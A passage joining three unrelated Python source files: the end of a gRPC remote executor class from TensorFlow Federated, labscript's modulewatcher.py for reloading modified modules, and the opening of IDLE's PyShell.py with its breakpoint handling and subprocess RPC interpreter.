return (isinstance(error, grpc.RpcError) and
error.code() not in non_retryable_errors)
class RemoteExecutor(executor_base.Executor):
"""The remote executor is a local proxy for a remote executor instance."""
# TODO(b/134543154): Switch to using an asynchronous gRPC client so we don't
# have to block on all those calls.
def __init__(self,
channel,
rpc_mode='REQUEST_REPLY',
thread_pool_executor=None,
dispose_batch_size=20):
"""Creates a remote executor.
Args:
channel: An instance of `grpc.Channel` to use for communication with the
remote executor service.
rpc_mode: Optional mode of calling the remote executor. Must be either
'REQUEST_REPLY' or 'STREAMING' (defaults to 'REQUEST_REPLY'). This
option will be removed after the request-reply interface is deprecated.
thread_pool_executor: Optional concurrent.futures.Executor used to wait
for the reply to a streaming RPC message. Uses the default Executor if
not specified.
dispose_batch_size: The batch size for requests to dispose of remote
worker values. Lower values will result in more requests to the remote
worker, but will result in values being cleaned up sooner and therefore
may result in lower memory usage on the remote worker.
"""
py_typecheck.check_type(channel, grpc.Channel)
py_typecheck.check_type(rpc_mode, str)
py_typecheck.check_type(dispose_batch_size, int)
if rpc_mode not in ['REQUEST_REPLY', 'STREAMING']:
raise ValueError('Invalid rpc_mode: {}'.format(rpc_mode))
logging.debug('Creating new ExecutorStub with RPC_MODE=%s', rpc_mode)
self._stub = executor_pb2_grpc.ExecutorStub(channel)
self._bidi_stream = None
self._dispose_batch_size = dispose_batch_size
self._dispose_request = executor_pb2.DisposeRequest()
if rpc_mode == 'STREAMING':
logging.debug('Creating Bidi stream')
self._bidi_stream = _BidiStream(self._stub, thread_pool_executor)
def close(self):
if self._bidi_stream is not None:
logging.debug('Closing bidi stream')
self._bidi_stream.close()
logging.debug('Clearing executor state on server.')
self._clear_executor()
def _dispose(self, value_ref: executor_pb2.ValueRef):
"""Disposes of the remote value stored on the worker service."""
self._dispose_request.value_ref.append(value_ref)
if len(self._dispose_request.value_ref) < self._dispose_batch_size:
return
dispose_request = self._dispose_request
self._dispose_request = executor_pb2.DisposeRequest()
if self._bidi_stream is None:
_request(self._stub.Dispose, dispose_request)
else:
send_request_fut = self._bidi_stream.send_request(
executor_pb2.ExecuteRequest(dispose=dispose_request))
# We don't care about the response, and so don't bother to await it.
# Just start it as a task so that it runs at some point.
asyncio.get_event_loop().create_task(send_request_fut)
@tracing.trace(span=True)
async def set_cardinalities(
self, cardinalities: Mapping[placement_literals.PlacementLiteral, int]):
serialized_cardinalities = executor_serialization.serialize_cardinalities(
cardinalities)
request = executor_pb2.SetCardinalitiesRequest(
cardinalities=serialized_cardinalities)
if self._bidi_stream is None:
_request(self._stub.SetCardinalities, request)
else:
await self._bidi_stream.send_request(
executor_pb2.ExecuteRequest(set_cardinalities=request))
return
@tracing.trace(span=True)
def _clear_executor(self):
request = executor_pb2.ClearExecutorRequest()
try:
_request(self._stub.ClearExecutor, request)
except (grpc.RpcError, execution_context.RetryableError):
logging.debug('RPC error caught during attempt to clear state on the '
'server; this likely indicates a broken connection, and '
'therefore there is no state to clear.')
return
@tracing.trace(span=True)
async def create_value(self, value, type_spec=None):
@tracing.trace
def serialize_value():
return executor_serialization.serialize_value(value, type_spec)
value_proto, type_spec = serialize_value()
create_value_request = executor_pb2.CreateValueRequest(value=value_proto)
if self._bidi_stream is None:
response = _request(self._stub.CreateValue, create_value_request)
else:
response = (await self._bidi_stream.send_request(
executor_pb2.ExecuteRequest(create_value=create_value_request)
)).create_value
py_typecheck.check_type(response, executor_pb2.CreateValueResponse)
return RemoteValue(response.value_ref, type_spec, self)
@tracing.trace(span=True)
async def create_call(self, comp, arg=None):
py_typecheck.check_type(comp, RemoteValue)
py_typecheck.check_type(comp.type_signature, computation_types.FunctionType)
if arg is not None:
py_typecheck.check_type(arg, RemoteValue)
create_call_request = executor_pb2.CreateCallRequest(
function_ref=comp.value_ref,
argument_ref=(arg.value_ref if arg is not None else None))
if self._bidi_stream is None:
response = _request(self._stub.CreateCall, create_call_request)
else:
response = (await self._bidi_stream.send_request(
executor_pb2.ExecuteRequest(create_call=create_call_request)
)).create_call
py_typecheck.check_type(response, executor_pb2.CreateCallResponse)
return RemoteValue(response.value_ref, comp.type_signature.result, self)
@tracing.trace(span=True)
async def create_struct(self, elements):
constructed_anon_tuple = structure.from_container(elements)
proto_elem = []
type_elem = []
for k, v in structure.iter_elements(constructed_anon_tuple):
py_typecheck.check_type(v, RemoteValue)
proto_elem.append(
executor_pb2.CreateStructRequest.Element(
name=(k if k else None), value_ref=v.value_ref))
type_elem.append((k, v.type_signature) if k else v.type_signature)
result_type = computation_types.StructType(type_elem)
request = executor_pb2.CreateStructRequest(element=proto_elem)
if self._bidi_stream is None:
response = _request(self._stub.CreateStruct, request)
else:
response = (await self._bidi_stream.send_request(
executor_pb2.ExecuteRequest(create_struct=request))).create_struct
py_typecheck.check_type(response, executor_pb2.CreateStructResponse)
return RemoteValue(response.value_ref, result_type, self)
@tracing.trace(span=True)
async def create_selection(self, source, index=None, name=None):
py_typecheck.check_type(source, RemoteValue)
py_typecheck.check_type(source.type_signature, computation_types.StructType)
if index is not None:
py_typecheck.check_type(index, int)
py_typecheck.check_none(name)
result_type = source.type_signature[index]
else:
py_typecheck.check_type(name, str)
result_type = getattr(source.type_signature, name)
request = executor_pb2.CreateSelectionRequest(
source_ref=source.value_ref, name=name, index=index)
if self._bidi_stream is None:
response = _request(self._stub.CreateSelection, request)
else:
response = (await self._bidi_stream.send_request(
executor_pb2.ExecuteRequest(create_selection=request)
)).create_selection
py_typecheck.check_type(response, executor_pb2.CreateSelectionResponse)
return RemoteValue(response.value_ref, result_type, self)
@tracing.trace(span=True)
async def _compute(self, value_ref):
py_typecheck.check_type(value_ref, executor_pb2.ValueRef)
request = executor_pb2.ComputeRequest(value_ref=value_ref)
if self._bidi_stream is None:
response = _request(self._stub.Compute, request)
else:
response = (await self._bidi_stream.send_request(
executor_pb2.ExecuteRequest(compute=request))).compute
py_typecheck.check_type(response, executor_pb2.ComputeResponse)
value, _ = executor_serialization.deserialize_value(response.value)
return value
|
modulewatcher.py
|
#####################################################################
# #
# modulewatcher.py #
# #
# Copyright 2013, Monash University #
# #
# This file is part of the labscript suite (see #
# http://labscriptsuite.org) and is licensed under the Simplified #
# BSD License. See the license.txt file in the root of the project #
# for the full license. #
# #
#####################################################################
from __future__ import division, unicode_literals, print_function, absolute_import
import sys
import threading
import time
import os
import imp
import site
import distutils.sysconfig
# Directories in which the standard library and installed packages may be located.
# Modules in these locations will be whitelisted:
PKGDIRS = [
distutils.sysconfig.get_python_lib(plat_specific=True, standard_lib=True),
distutils.sysconfig.get_python_lib(plat_specific=True, standard_lib=False),
distutils.sysconfig.get_python_lib(plat_specific=False, standard_lib=True),
distutils.sysconfig.get_python_lib(plat_specific=False, standard_lib=False),
site.getusersitepackages(),
]
PKGDIRS += site.getsitepackages()
PKGDIRS = set(PKGDIRS)
class ModuleWatcher(object):
def __init__(self, debug=False):
self.debug = debug
# A lock to hold whenever you don't want modules unloaded:
self.lock = threading.Lock()
# The whitelist is the list of names of currently loaded modules:
self.whitelist = set(sys.modules)
self.meta_whitelist = list(sys.meta_path)
self.modified_times = {}
self.main = threading.Thread(target=self.mainloop)
self.main.daemon = True
self.main.start()
def mainloop(self):
while True:
time.sleep(1)
with self.lock:
# Acquire the import lock so that we don't unload modules whilst an
# import is in progess:
imp.acquire_lock()
try:
if self.check():
self.unload()
finally:
# We're done mucking around with the cached modules, normal imports
# in other threads may resume:
imp.release_lock()
def check(self):
unload_required = False
# Look through currently loaded modules:
for name, module in sys.modules.copy().items():
# Look only at the modules not in the the whitelist:
if name not in self.whitelist:
# Only consider modules which have a non-None __file__ attribute, are
# .py (or .pyc) files (no C extensions or builtin modules), that exist
# on disk, and that aren't in standard package directories. Add modules
# we won't consider to the whitelist so that we don't consider them in
# future calls.
if getattr(module, '__file__', None) is None:
self.whitelist.add(name)
continue
module_file = module.__file__
if module_file.endswith('.pyc'):
module_file = os.path.splitext(module_file)[0] + '.py'
if not module_file.endswith('.py') or not os.path.exists(module_file):
self.whitelist.add(name)
continue
if any(module_file.startswith(s + os.path.sep) for s in PKGDIRS):
# Whitelist modules in package install directories:
self.whitelist.add(name)
continue
# Check and store the modified time of the .py file:
modified_time = os.path.getmtime(module_file)
previous_modified_time = self.modified_times.setdefault(
name, modified_time
)
self.modified_times[name] = modified_time
if modified_time != previous_modified_time:
# A module has been modified! Unload all modules not in the
# whitelist:
unload_required = True
message = (
'%s modified: all non-whitelisted modules ' % module_file
+ 'will be reloaded next run.\n'
)
sys.stderr.write(message)
return unload_required
def unload(self):
if self.debug:
print("ModuleWatcher: whitelist is:")
for name in sorted(self.whitelist):
print(" " + name)
print("\nModuleWatcher: modules unloaded:")
for name in sorted(sys.modules):
if name not in self.whitelist:
# This unloads a module. This is slightly more general than
# reload(module), but has the same caveats regarding existing
# references. This also means that any exception in the import will
# occur later, once the module is (re)imported, rather than now
# where catching the exception would have to be handled differently.
del sys.modules[name]
if name in self.modified_times:
del self.modified_times[name]
if self.debug:
print(" " + name)
# Replace sys.meta_path with the cached whitelist, effectively removing all
# since-added entries from it. Replacement is done in-place in case other
# code holds references to sys.meta_path, and to preserve order, since order
# is relevant.
sys.meta_path[:] = self.meta_whitelist
|
PyShell.py
|
#! /usr/bin/env python
import os
import os.path
import sys
import string
import getopt
import re
import socket
import time
import threading
import traceback
import types
import macosxSupport
import linecache
from code import InteractiveInterpreter
try:
from Tkinter import *
except ImportError:
print>>sys.__stderr__, "** IDLE can't import Tkinter. " \
"Your Python may not be configured for Tk. **"
sys.exit(1)
import tkMessageBox
from EditorWindow import EditorWindow, fixwordbreaks
from FileList import FileList
from ColorDelegator import ColorDelegator
from UndoDelegator import UndoDelegator
from OutputWindow import OutputWindow
from configHandler import idleConf
import idlever
import rpc
import Debugger
import RemoteDebugger
IDENTCHARS = string.ascii_letters + string.digits + "_"
LOCALHOST = '127.0.0.1'
try:
from signal import SIGTERM
except ImportError:
SIGTERM = 15
# Override warnings module to write to warning_stream. Initialize to send IDLE
# internal warnings to the console. ScriptBinding.check_syntax() will
# temporarily redirect the stream to the shell window to display warnings when
# checking user's code.
global warning_stream
warning_stream = sys.__stderr__
try:
import warnings
except ImportError:
pass
else:
def idle_showwarning(message, category, filename, lineno):
file = warning_stream
try:
file.write(warnings.formatwarning(message, category, filename, lineno))
except IOError:
pass ## file (probably __stderr__) is invalid, warning dropped.
warnings.showwarning = idle_showwarning
def idle_formatwarning(message, category, filename, lineno):
"""Format warnings the IDLE way"""
s = "\nWarning (from warnings module):\n"
s += ' File \"%s\", line %s\n' % (filename, lineno)
line = linecache.getline(filename, lineno).strip()
if line:
s += " %s\n" % line
s += "%s: %s\n>>> " % (category.__name__, message)
return s
warnings.formatwarning = idle_formatwarning
def extended_linecache_checkcache(filename=None,
orig_checkcache=linecache.checkcache):
"""Extend linecache.checkcache to preserve the <pyshell#...> entries
Rather than repeating the linecache code, patch it to save the
<pyshell#...> entries, call the original linecache.checkcache()
(which destroys them), and then restore the saved entries.
orig_checkcache is bound at definition time to the original
method, allowing it to be patched.
"""
cache = linecache.cache
save = {}
for filename in cache.keys():
if filename[:1] + filename[-1:] == '<>':
save[filename] = cache[filename]
orig_checkcache()
cache.update(save)
# Patch linecache.checkcache():
linecache.checkcache = extended_linecache_checkcache
class PyShellEditorWindow(EditorWindow):
"Regular text edit window in IDLE, supports breakpoints"
def __init__(self, *args):
self.breakpoints = []
EditorWindow.__init__(self, *args)
self.text.bind("<<set-breakpoint-here>>", self.set_breakpoint_here)
self.text.bind("<<clear-breakpoint-here>>", self.clear_breakpoint_here)
self.text.bind("<<open-python-shell>>", self.flist.open_shell)
self.breakpointPath = os.path.join(idleConf.GetUserCfgDir(),
'breakpoints.lst')
# whenever a file is changed, restore breakpoints
if self.io.filename: self.restore_file_breaks()
def filename_changed_hook(old_hook=self.io.filename_change_hook,
self=self):
self.restore_file_breaks()
old_hook()
self.io.set_filename_change_hook(filename_changed_hook)
rmenu_specs = [("Set Breakpoint", "<<set-breakpoint-here>>"),
("Clear Breakpoint", "<<clear-breakpoint-here>>")]
def set_breakpoint(self, lineno):
text = self.text
filename = self.io.filename
text.tag_add("BREAK", "%d.0" % lineno, "%d.0" % (lineno+1))
try:
i = self.breakpoints.index(lineno)
except ValueError: # only add if missing, i.e. do once
self.breakpoints.append(lineno)
try: # update the subprocess debugger
debug = self.flist.pyshell.interp.debugger
debug.set_breakpoint_here(filename, lineno)
except: # but debugger may not be active right now....
pass
def set_breakpoint_here(self, event=None):
text = self.text
filename = self.io.filename
if not filename:
text.bell()
return
lineno = int(float(text.index("insert")))
self.set_breakpoint(lineno)
def clear_breakpoint_here(self, event=None):
text = self.text
filename = self.io.filename
if not filename:
text.bell()
return
lineno = int(float(text.index("insert")))
try:
self.breakpoints.remove(lineno)
except:
pass
text.tag_remove("BREAK", "insert linestart",\
"insert lineend +1char")
try:
debug = self.flist.pyshell.interp.debugger
debug.clear_breakpoint_here(filename, lineno)
except:
pass
def clear_file_breaks(self):
if self.breakpoints:
text = self.text
filename = self.io.filename
if not filename:
text.bell()
return
self.breakpoints = []
text.tag_remove("BREAK", "1.0", END)
try:
debug = self.flist.pyshell.interp.debugger
debug.clear_file_breaks(filename)
except:
pass
def store_file_breaks(self):
"Save breakpoints when file is saved"
# XXX 13 Dec 2002 KBK Currently the file must be saved before it can
# be run. The breaks are saved at that time. If we introduce
# a temporary file save feature the save breaks functionality
# needs to be re-verified, since the breaks at the time the
# temp file is created may differ from the breaks at the last
# permanent save of the file. Currently, a break introduced
# after a save will be effective, but not persistent.
# This is necessary to keep the saved breaks synched with the
# saved file.
#
# Breakpoints are set as tagged ranges in the text. Certain
# kinds of edits cause these ranges to be deleted: Inserting
# or deleting a line just before a breakpoint, and certain
# deletions prior to a breakpoint. These issues need to be
# investigated and understood. It's not clear if they are
# Tk issues or IDLE issues, or whether they can actually
# be fixed. Since a modified file has to be saved before it is
# run, and since self.breakpoints (from which the subprocess
# debugger is loaded) is updated during the save, the visible
# breaks stay synched with the subprocess even if one of these
# unexpected breakpoint deletions occurs.
breaks = self.breakpoints
filename = self.io.filename
try:
lines = open(self.breakpointPath,"r").readlines()
except IOError:
lines = []
new_file = open(self.breakpointPath,"w")
for line in lines:
if not line.startswith(filename + '='):
new_file.write(line)
self.update_breakpoints()
breaks = self.breakpoints
if breaks:
new_file.write(filename + '=' + str(breaks) + '\n')
new_file.close()
def restore_file_breaks(self):
self.text.update() # this enables setting "BREAK" tags to be visible
filename = self.io.filename
if filename is None:
return
if os.path.isfile(self.breakpointPath):
lines = open(self.breakpointPath,"r").readlines()
for line in lines:
if line.startswith(filename + '='):
breakpoint_linenumbers = eval(line[len(filename)+1:])
for breakpoint_linenumber in breakpoint_linenumbers:
self.set_breakpoint(breakpoint_linenumber)
def update_breakpoints(self):
"Retrieves all the breakpoints in the current window"
text = self.text
ranges = text.tag_ranges("BREAK")
linenumber_list = self.ranges_to_linenumbers(ranges)
self.breakpoints = linenumber_list
def ranges_to_linenumbers(self, ranges):
lines = []
for index in range(0, len(ranges), 2):
lineno = int(float(ranges[index]))
end = int(float(ranges[index+1]))
while lineno < end:
lines.append(lineno)
lineno += 1
return lines
# XXX 13 Dec 2002 KBK Not used currently
# def saved_change_hook(self):
# "Extend base method - clear breaks if module is modified"
# if not self.get_saved():
# self.clear_file_breaks()
# EditorWindow.saved_change_hook(self)
def _close(self):
"Extend base method - clear breaks when module is closed"
self.clear_file_breaks()
EditorWindow._close(self)
class PyShellFileList(FileList):
"Extend base class: IDLE supports a shell and breakpoints"
# override FileList's class variable, instances return PyShellEditorWindow
# instead of EditorWindow when new edit windows are created.
EditorWindow = PyShellEditorWindow
pyshell = None
def open_shell(self, event=None):
if self.pyshell:
self.pyshell.top.wakeup()
else:
self.pyshell = PyShell(self)
if self.pyshell:
if not self.pyshell.begin():
return None
return self.pyshell
class ModifiedColorDelegator(ColorDelegator):
"Extend base class: colorizer for the shell window itself"
def __init__(self):
ColorDelegator.__init__(self)
self.LoadTagDefs()
def recolorize_main(self):
self.tag_remove("TODO", "1.0", "iomark")
self.tag_add("SYNC", "1.0", "iomark")
ColorDelegator.recolorize_main(self)
def LoadTagDefs(self):
ColorDelegator.LoadTagDefs(self)
theme = idleConf.GetOption('main','Theme','name')
self.tagdefs.update({
"stdin": {'background':None,'foreground':None},
"stdout": idleConf.GetHighlight(theme, "stdout"),
"stderr": idleConf.GetHighlight(theme, "stderr"),
"console": idleConf.GetHighlight(theme, "console"),
})
class ModifiedUndoDelegator(UndoDelegator):
"Extend base class: forbid insert/delete before the I/O mark"
def insert(self, index, chars, tags=None):
try:
if self.delegate.compare(index, "<", "iomark"):
self.delegate.bell()
return
except TclError:
pass
UndoDelegator.insert(self, index, chars, tags)
def delete(self, index1, index2=None):
try:
if self.delegate.compare(index1, "<", "iomark"):
self.delegate.bell()
return
except TclError:
pass
UndoDelegator.delete(self, index1, index2)
class MyRPCClient(rpc.RPCClient):
def handle_EOF(self):
"Override the base class - just re-raise EOFError"
raise EOFError
class ModifiedInterpreter(InteractiveInterpreter):
def __init__(self, tkconsole):
self.tkconsole = tkconsole
locals = sys.modules['__main__'].__dict__
InteractiveInterpreter.__init__(self, locals=locals)
self.save_warnings_filters = None
self.restarting = False
self.subprocess_arglist = self.build_subprocess_arglist()
port = 8833
rpcclt = None
rpcpid = None
def spawn_subprocess(self):
args = self.subprocess_arglist
self.rpcpid = os.spawnv(os.P_NOWAIT, sys.executable, args)
def build_subprocess_arglist(self):
w = ['-W' + s for s in sys.warnoptions]
if 1/2 > 0: # account for new division
w.append('-Qnew')
# Maybe IDLE is installed and is being accessed via sys.path,
# or maybe it's not installed and the idle.py script is being
# run from the IDLE source directory.
del_exitf = idleConf.GetOption('main', 'General', 'delete-exitfunc',
default=False, type='bool')
if __name__ == 'idlelib.PyShell':
command = "__import__('idlelib.run').run.main(%r)" % (del_exitf,)
else:
command = "__import__('run').main(%r)" % (del_exitf,)
if sys.platform[:3] == 'win' and ' ' in sys.executable:
# handle embedded space in path by quoting the argument
decorated_exec = '"%s"' % sys.executable
else:
decorated_exec = sys.executable
return [decorated_exec] + w + ["-c", command, str(self.port)]
def start_subprocess(self):
# spawning first avoids passing a listening socket to the subprocess
self.spawn_subprocess()
#time.sleep(20) # test to simulate GUI not accepting connection
addr = (LOCALHOST, self.port)
# Idle starts listening for connection on localhost
for i in range(3):
time.sleep(i)
try:
self.rpcclt = MyRPCClient(addr)
break
except socket.error, err:
pass
else:
self.display_port_binding_error()
return None
# Accept the connection from the Python execution server
self.rpcclt.listening_sock.settimeout(10)
try:
self.rpcclt.accept()
except socket.timeout, err:
self.display_no_subprocess_error()
return None
self.rpcclt.register("stdin", self.tkconsole)
self.rpcclt.register("stdout", self.tkconsole.stdout)
self.rpcclt.register("stderr", self.tkconsole.stderr)
self.rpcclt.register("flist", self.tkconsole.flist)
self.rpcclt.register("linecache", linecache)
self.rpcclt.register("interp", self)
self.transfer_path()
self.poll_subprocess()
return self.rpcclt
def restart_subprocess(self):
if self.restarting:
return self.rpcclt
self.restarting = True
# close only the subprocess debugger
debug = self.getdebugger()
if debug:
try:
# Only close subprocess debugger, don't unregister gui_adap!
RemoteDebugger.close_subprocess_debugger(self.rpcclt)
except:
pass
# Kill subprocess, spawn a new one, accept connection.
self.rpcclt.close()
self.unix_terminate()
console = self.tkconsole
was_executing = console.executing
console.executing = False
self.spawn_subprocess()
try:
self.rpcclt.accept()
except socket.timeout, err:
self.display_no_subprocess_error()
return None
self.transfer_path()
# annotate restart in shell window and mark it
console.text.delete("iomark", "end-1c")
if was_executing:
console.write('\n')
console.showprompt()
halfbar = ((int(console.width) - 16) // 2) * '='
console.write(halfbar + ' RESTART ' + halfbar)
console.text.mark_set("restart", "end-1c")
console.text.mark_gravity("restart", "left")
console.showprompt()
# restart subprocess debugger
if debug:
# Restarted debugger connects to current instance of debug GUI
gui = RemoteDebugger.restart_subprocess_debugger(self.rpcclt)
# reload remote debugger breakpoints for all PyShellEditWindows
debug.load_breakpoints()
self.restarting = False
return self.rpcclt
def __request_interrupt(self):
self.rpcclt.remotecall("exec", "interrupt_the_server", (), {})
def interrupt_subprocess(self):
threading.Thread(target=self.__request_interrupt).start()
def kill_subprocess(self):
try:
self.rpcclt.close()
except AttributeError: # no socket
pass
self.unix_terminate()
self.tkconsole.executing = False
self.rpcclt = None
def unix_terminate(self):
"UNIX: make sure subprocess is terminated and collect status"
if hasattr(os, 'kill'):
try:
os.kill(self.rpcpid, SIGTERM)
except OSError:
# process already terminated:
return
else:
try:
os.waitpid(self.rpcpid, 0)
except OSError:
return
def transfer_path(self):
self.runcommand("""if 1:
import sys as _sys
_sys.path = %r
del _sys
\n""" % (sys.path,))
active_seq = None
def poll_subprocess(self):
clt = self.rpcclt
if clt is None:
return
try:
response = clt.pollresponse(self.active_seq, wait=0.05)
except (EOFError, IOError, KeyboardInterrupt):
# lost connection or subprocess terminated itself, restart
# [the KBI is from rpc.SocketIO.handle_EOF()]
if self.tkconsole.closing:
return
response = None
self.restart_subprocess()
if response:
self.tkconsole.resetoutput()
self.active_seq = None
how, what = response
console = self.tkconsole.console
if how == "OK":
if what is not None:
print >>console, repr(what)
elif how == "EXCEPTION":
if self.tkconsole.getvar("<<toggle-jit-stack-viewer>>"):
self.remote_stack_viewer()
elif how == "ERROR":
errmsg = "PyShell.ModifiedInterpreter: Subprocess ERROR:\n"
print >>sys.__stderr__, errmsg, what
print >>console, errmsg, what
# we received a response to the currently active seq number:
try:
self.tkconsole.endexecuting()
except AttributeError: # shell may have closed
pass
# Reschedule myself
if not self.tkconsole.closing:
self.tkconsole.text.after(self.tkconsole.pollinterval,
self.poll_subprocess)
debugger = None
def setdebugger(self, debugger):
self.debugger = debugger
def getdebugger(self):
return self.debugger
def open_remote_stack_viewer(self):
"""Initiate the remote stack viewer from a separate thread.
This method is called from the subprocess, and by returning from this
method we allow the subprocess to unblock. After a bit the shell
requests the subprocess to open the remote stack viewer which returns a
static object looking at the last exceptiopn. It is queried through
the RPC mechanism.
"""
self.tkconsole.text.after(300, self.remote_stack_viewer)
return
def remote_stack_viewer(self):
import RemoteObjectBrowser
oid = self.rpcclt.remotequeue("exec", "stackviewer", ("flist",), {})
if oid is None:
self.tkconsole.root.bell()
return
item = RemoteObjectBrowser.StubObjectTreeItem(self.rpcclt, oid)
from TreeWidget import ScrolledCanvas, TreeNode
top = Toplevel(self.tkconsole.root)
theme = idleConf.GetOption('main','Theme','name')
background = idleConf.GetHighlight(theme, 'normal')['background']
sc = ScrolledCanvas(top, bg=background, highlightthickness=0)
sc.frame.pack(expand=1, fill="both")
node = TreeNode(sc.canvas, None, item)
node.expand()
# XXX Should GC the remote tree when closing the window
gid = 0
def execsource(self, source):
"Like runsource() but assumes complete exec source"
filename = self.stuffsource(source)
self.execfile(filename, source)
def execfile(self, filename, source=None):
"Execute an existing file"
if source is None:
source = open(filename, "r").read()
try:
code = compile(source, filename, "exec")
except (OverflowError, SyntaxError):
self.tkconsole.resetoutput()
tkerr = self.tkconsole.stderr
print>>tkerr, '*** Error in script or command!\n'
print>>tkerr, 'Traceback (most recent call last):'
InteractiveInterpreter.showsyntaxerror(self, filename)
self.tkconsole.showprompt()
else:
self.runcode(code)
def runsource(self, source):
"Extend base class method: Stuff the source in the line cache first"
filename = self.stuffsource(source)
self.more = 0
self.save_warnings_filters = warnings.filters[:]
warnings.filterwarnings(action="error", category=SyntaxWarning)
if isinstance(source, types.UnicodeType):
import IOBinding
try:
source = source.encode(IOBinding.encoding)
except UnicodeError:
self.tkconsole.resetoutput()
self.write("Unsupported characters in input\n")
return
try:
# InteractiveInterpreter.runsource() calls its runcode() method,
# which is overridden (see below)
return InteractiveInterpreter.runsource(self, source, filename)
finally:
if self.save_warnings_filters is not None:
warnings.filters[:] = self.save_warnings_filters
self.save_warnings_filters = None
def stuffsource(self, source):
"Stuff source in the filename cache"
filename = "<pyshell#%d>" % self.gid
self.gid = self.gid + 1
lines = source.split("\n")
linecache.cache[filename] = len(source)+1, 0, lines, filename
return filename
def prepend_syspath(self, filename):
"Prepend sys.path with file's directory if not already included"
self.runcommand("""if 1:
_filename = %r
import sys as _sys
from os.path import dirname as _dirname
_dir = _dirname(_filename)
if not _dir in _sys.path:
_sys.path.insert(0, _dir)
del _filename, _sys, _dirname, _dir
\n""" % (filename,))
def showsyntaxerror(self, filename=None):
"""Extend base class method: Add Colorizing
Color the offending position instead of printing it and pointing at it
with a caret.
"""
text = self.tkconsole.text
stuff = self.unpackerror()
if stuff:
msg, lineno, offset, line = stuff
if lineno == 1:
pos = "iomark + %d chars" % (offset-1)
else:
pos = "iomark linestart + %d lines + %d chars" % \
(lineno-1, offset-1)
text.tag_add("ERROR", pos)
text.see(pos)
char = text.get(pos)
if char and char in IDENTCHARS:
text.tag_add("ERROR", pos + " wordstart", pos)
self.tkconsole.resetoutput()
self.write("SyntaxError: %s\n" % str(msg))
else:
self.tkconsole.resetoutput()
InteractiveInterpreter.showsyntaxerror(self, filename)
self.tkconsole.showprompt()
def unpackerror(self):
type, value, tb = sys.exc_info()
ok = type is SyntaxError
if ok:
try:
msg, (dummy_filename, lineno, offset, line) = value
if not offset:
offset = 0
except:
ok = 0
if ok:
return msg, lineno, offset, line
else:
return None
def showtraceback(self):
"Extend base class method to reset output properly"
self.tkconsole.resetoutput()
self.checklinecache()
InteractiveInterpreter.showtraceback(self)
if self.tkconsole.getvar("<<toggle-jit-stack-viewer>>"):
self.tkconsole.open_stack_viewer()
def checklinecache(self):
c = linecache.cache
for key in c.keys():
if key[:1] + key[-1:] != "<>":
del c[key]
def runcommand(self, code):
"Run the code without invoking the debugger"
# The code better not raise an exception!
if self.tkconsole.executing:
self.display_executing_dialog()
return 0
if self.rpcclt:
self.rpcclt.remotequeue("exec", "runcode", (code,), {})
else:
exec code in self.locals
return 1
def runcode(self, code):
"Override base class method"
if self.tkconsole.executing:
self.interp.restart_subprocess()
self.checklinecache()
if self.save_warnings_filters is not None:
warnings.filters[:] = self.save_warnings_filters
self.save_warnings_filters = None
debugger = self.debugger
try:
self.tkconsole.beginexecuting()
if not debugger and self.rpcclt is not None:
self.active_seq = self.rpcclt.asyncqueue("exec", "runcode",
(code,), {})
elif debugger:
debugger.run(code, self.locals)
else:
exec code in self.locals
except SystemExit:
if not self.tkconsole.closing:
if tkMessageBox.askyesno(
"Exit?",
"Do you want to exit altogether?",
default="yes",
master=self.tkconsole.text):
raise
else:
self.showtraceback()
else:
raise
except:
if use_subprocess:
print >>self.tkconsole.stderr, \
"IDLE internal error in runcode()"
self.showtraceback()
self.tkconsole.endexecuting()
else:
if self.tkconsole.canceled:
self.tkconsole.canceled = False
print >>self.tkconsole.stderr, "KeyboardInterrupt"
else:
self.showtraceback()
finally:
if not use_subprocess:
try:
self.tkconsole.endexecuting()
except AttributeError: # shell may have closed
pass
def write(self, s):
"Override base class method"
self.tkconsole.stderr.write(s)
def display_port_binding_error(self):
tkMessageBox.showerror(
"Port Binding Error",
"IDLE can't bind TCP/IP port 8833, which is necessary to "
"communicate with its Python execution server. Either "
"no networking is installed on this computer or another "
"process (another IDLE?) is using the port. Run IDLE with the -n "
"command line switch to start without a subprocess and refer to "
"Help/IDLE Help 'Running without a subprocess' for further "
"details.",
master=self.tkconsole.text)
def display_no_subprocess_error(self):
tkMessageBox.showerror(
"Subprocess Startup Error",
"IDLE's subprocess didn't make connection. Either IDLE can't "
"start a subprocess or personal firewall software is blocking "
"the connection.",
master=self.tkconsole.text)
def display_executing_dialog(self):
tkMessageBox.showerror(
"Already executing",
"The Python Shell window is already executing a command; "
"please wait until it is finished.",
master=self.tkconsole.text)
class PyShell(OutputWindow):
shell_title = "Python Shell"
# Override classes
ColorDelegator = ModifiedColorDelegator
UndoDelegator = ModifiedUndoDelegator
# Override menus
menu_specs = [
("file", "_File"),
("edit", "_Edit"),
("debug", "_Debug"),
("options", "_Options"),
("windows", "_Windows"),
("help", "_Help"),
]
if macosxSupport.runningAsOSXApp():
del menu_specs[-3]
menu_specs[-2] = ("windows", "_Window")
# New classes
from IdleHistory import History
def __init__(self, flist=None):
if use_subprocess:
ms = self.menu_specs
if ms[2][0] != "shell":
ms.insert(2, ("shell", "She_ll"))
self.interp = ModifiedInterpreter(self)
if flist is None:
root = Tk()
fixwordbreaks(root)
root.withdraw()
flist = PyShellFileList(root)
#
OutputWindow.__init__(self, flist, None, None)
#
## self.config(usetabs=1, indentwidth=8, context_use_ps1=1)
self.usetabs = True
# indentwidth must be 8 when using tabs. See note in EditorWindow:
self.indentwidth = 8
self.context_use_ps1 = True
#
text = self.text
text.configure(wrap="char")
text.bind("<<newline-and-indent>>", self.enter_callback)
text.bind("<<plain-newline-and-indent>>", self.linefeed_callback)
text.bind("<<interrupt-execution>>", self.cancel_callback)
text.bind("<<end-of-file>>", self.eof_callback)
text.bind("<<open-stack-viewer>>", self.open_stack_viewer)
text.bind("<<toggle-debugger>>", self.toggle_debugger)
text.bind("<<toggle-jit-stack-viewer>>", self.toggle_jit_stack_viewer)
if use_subprocess:
text.bind("<<view-restart>>", self.view_restart_mark)
text.bind("<<restart-shell>>", self.restart_shell)
#
self.save_stdout = sys.stdout
self.save_stderr = sys.stderr
self.save_stdin = sys.stdin
import IOBinding
self.stdout = PseudoFile(self, "stdout", IOBinding.encoding)
self.stderr = PseudoFile(self, "stderr", IOBinding.encoding)
self.console = PseudoFile(self, "console", IOBinding.encoding)
if not use_subprocess:
sys.stdout = self.stdout
sys.stderr = self.stderr
sys.stdin = self
#
self.history = self.History(self.text)
#
self.pollinterval = 50 # millisec
def get_standard_extension_names(self):
return idleConf.GetExtensions(shell_only=True)
reading = False
executing = False
canceled = False
endoffile = False
closing = False
def set_warning_stream(self, stream):
